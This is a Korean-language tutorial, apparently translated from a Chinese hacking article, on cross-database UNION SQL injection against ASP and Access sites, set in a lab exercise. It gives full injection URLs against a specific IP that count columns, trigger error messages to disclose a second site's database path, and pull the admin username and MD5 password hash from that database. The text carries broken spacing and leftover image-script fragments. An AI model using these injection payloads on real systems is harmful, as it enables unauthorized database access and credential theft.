mssql 의 크로스 라 이브 러 리 조회 기억 하 시 죠?사실은 access 에서 도 2 개의 데이터 간 의 교차 조 회 를 실현 할 수 있 습 니 다.다음은 access 의 크로스 라 이브 러 리 조 회 를 소개 하 겠 습 니 다.먼저 access 에서 mdb 파일 에 대한 조 회 를 어떻게 실현 하 는 지 보 여 줍 니 다.우 리 는 빈 데이터 베 이 스 를 만 들 고 데이터베이스 D:\daos\db\daidalos.mdb 의 admin 표 내용 을 조회 합 니 다.SQL 문 구 는
javascript:if(this.width>500)this.width=500" border=0>조회 한 후에 목표 데이터 라 이브 러 리 표 admin 표 의 내용 을 성공 적 으로 되 돌려 줍 니 다.
javascript:if(this.width>500)this.width=500" border=0>실제 asp 주사 에서2 개의 select 를 동시에 진행 하려 면 phop+my sql 주 사 를 잘 알 고 있다 면 유 니 온 을 사용 하여 공동 조 회 를 하 는 것 을 쉽게 생각 할 수 있 을 것 입 니 다.access 에서 도 사용 할 수 있 습 니 다.유 니 온 조 회 를 사용 하면 데이터 에 대해 한 글자 씩 추측 하지 않 는 것 이 좋 습 니 다.my sql+phop 주사 처럼 필드 의 데 이 터 를 직접 꺼 낼 수 있 습 니 다(구체 적 인 mix 는 상세 한 글 을 썼 습 니 다).위 에서 알 수 있 듯 이 크로스 라 이브 러 리 조 회 를 실현 하려 면 다음 과 같은 두 가지 조건 이 필요 합 니 다.유 니 온 조 회 를 사용 하려 면 앞의 selection 표 의 필드 수 를 알 아야 합 니 다.목표 데이터 뱅 크 의 위치,절대 경 로 를 알 아야 합 니 다.조건 1 우 리 는 제시 오류 정보 에 따라 손 으로 추측 할 수도 있 고 프로그램 을 통 해 자동 으로 실현 할 수도 있다.조건 2 이것 은 어 려 운 점 이지 만 우 리 는'access 폭 고'를 이용 하여 실현 할 수 있다.어떤 사람 은 데이터 위 치 를 알 수 있 으 면 직접 다운로드 하지 않 고 당 겨 야 한다 고 말 할 것 이다.그렇지 않 으 면 현재 의 데이터 베 이 스 는 일반적으로 다운 로드 를 방지 하고 어떤 사람 은 웹 디 렉 터 리 에 있 지 않다.흑 방 4 차 실험실 의 첫 번 째 관문 은 바로 설 치 된 2 개의 asp+access 다운로드 시스템 이다.하 나 는 빗방울 다운로드 시스템 이 고 하 나 는 도수 다운로드 시스템 이다.테스트 를 통 해 도수 다운로드 시스템 은 데이터 베 이 스 를 폭발 시 킬 수 있 지만 다운로드 하지 못 하 게 하고 주사 할 곳 도 없 는 것 같 습 니 다.빗방울 다운로드 시스템 은 허점 투 성 이 입 니 다.데이터 베 이 스 는 폭발 적 이 고 직접 다운로드 할 수 있 으 며 주사 도 할 수 있 습 니 다.하지만 빗방울 의 백 스테이지 는 간단 합 니 다.이용 할 수 있 는 곳 이 없습니다.우리 의 목 표 는 도둑 의 백 스테이지 비밀 번 호 를 얻 는 것 입 니 다.다음은 제 가 보 여 드 리 겠 습 니 다.빗방울 시스템 의 주사 점 을 통 해 도둑 시스템 의 크로스 라 이브 러 리 를 조회 하여 도둑 의 백 스테이지 비밀 번 호 를 얻 을 수 있 습 니 다.우 리 는 빗방울 시스템 의 list.asp 가 주사 할 수 있다 는 것 을 알 고 있 습 니 다.우 리 는 먼저 유 니 온 의 데이터 시트 필드 수 를 얻어 제출 해 야 합 니 다.http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo 반환:Microsoft JET Database Engine 오류'80040 e14'가 공동 조회 에서 선택 한 두 개의 데이터 시트 나 조회 의 열 수 와 일치 하지 않 습 니 다./yddown/list.asp,줄 51 필드 가 잘못 되 었 습 니 다.perl 스 크 립 트 를 써 서 자동 으로 맞 혔 습 니 다.(코드 참조)제출 할 때:http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo 오류 없 이 반환:
javascript:if(this.width>500)this.width=500" border=0>하하!우 리 는 이미 필드 수 를 얻 었 고,필드 1 의 내 위 치 를 얻 을 수 있 으 며,우리 가 조회 한 데 이 터 를 표시 할 수 있다.지금 은 도수 의 데이터베이스 위치 가 부족 합 니 다.간단하게 저희 가 폭 고 를 해서 제출 하 겠 습 니 다.http://219.237.81.46/dsdown%5cregs.asp 성공 적 인 반환 경로:Microsoft JET Database Engine 오류'80004005''D:\111\\db\kljdsld.asa'는 올 바른 경로 가 아 닙 니 다.경로 이름 맞 춤 법 이 올 바른 지,파일 에 저 장 된 서버 에 연결 되 었 는 지 확인 합 니 다./dsdown/db/user.asp,행 6(주의:이렇게 얻 은 경 로 는 반드시'완전'이 아 닙 니 다.진정한 경 로 는 D:\111\dsdown\\db\kljdsld.asa)다음 에 우리 가 라 이브 러 리 를 뛰 어 넘 고 url 은 다음 과 같 습 니 다.http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\\db\kljdsld.asa"%20where%20id=1 위의 문 구 는 유 니 온 조회 데이터 D:\111\\db\kljdsld.asa 의 표 admin 리 id=1 필드 admin 의 데이터 입 니 다.백그라운드 에서 관리 하 는 사용자 이름 을 성공 적 으로 꺼 냅 니 다.
javascript:if(this.width>500)this.width=500" border=0>사용자 이름 을 admin 으로 받 으 면 비밀 번 호 를 입력 합 니 다.http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\\db\kljdsld.asa"%20where%20id=1 그림:
javascript:if(this.width>500)this.width=500" border=0>비밀번호 가 32 비트 인 md5 암호 화 된 hash:77 e6cbb3f9468 eadb 655 ae 6826357922,우 리 는 라 이브 러 리 를 뛰 어 넘 는 조회 에 성 공 했 습 니 다.여 기 는 라 이브 러 리 를 뛰 어 넘 는 조 회 를 보 여 드 리 는 것 일 뿐 입 니 다.소결 본 고 는 주로 여러분 에 게 매우 유용 한 방법 두 가 지 를 소개 하 였 습 니 다.첫째,우 리 는 asp 주 사 를 놓 을 때 한 글자 한 글자 씩 맞 혀 야 합 니 다.그러면 중국어 의 번 거 로 움 을 만 났 습 니 다.직접 유 니 온 으로 데 이 터 를 대체 하면 데 이 터 를 직접 폭발 시 킬 수 있 습 니 다.중국어 든 특수 문자 든 모두 한 걸음 에 도착 할 수 있 습 니 다.두 번 째 는 바로 라 이브 러 리 를 뛰 어 넘 고 사용 이 유연 하 며 침투 할 때 사용 할 수 있 습 니 다.뜻 하지 않 은 수확.
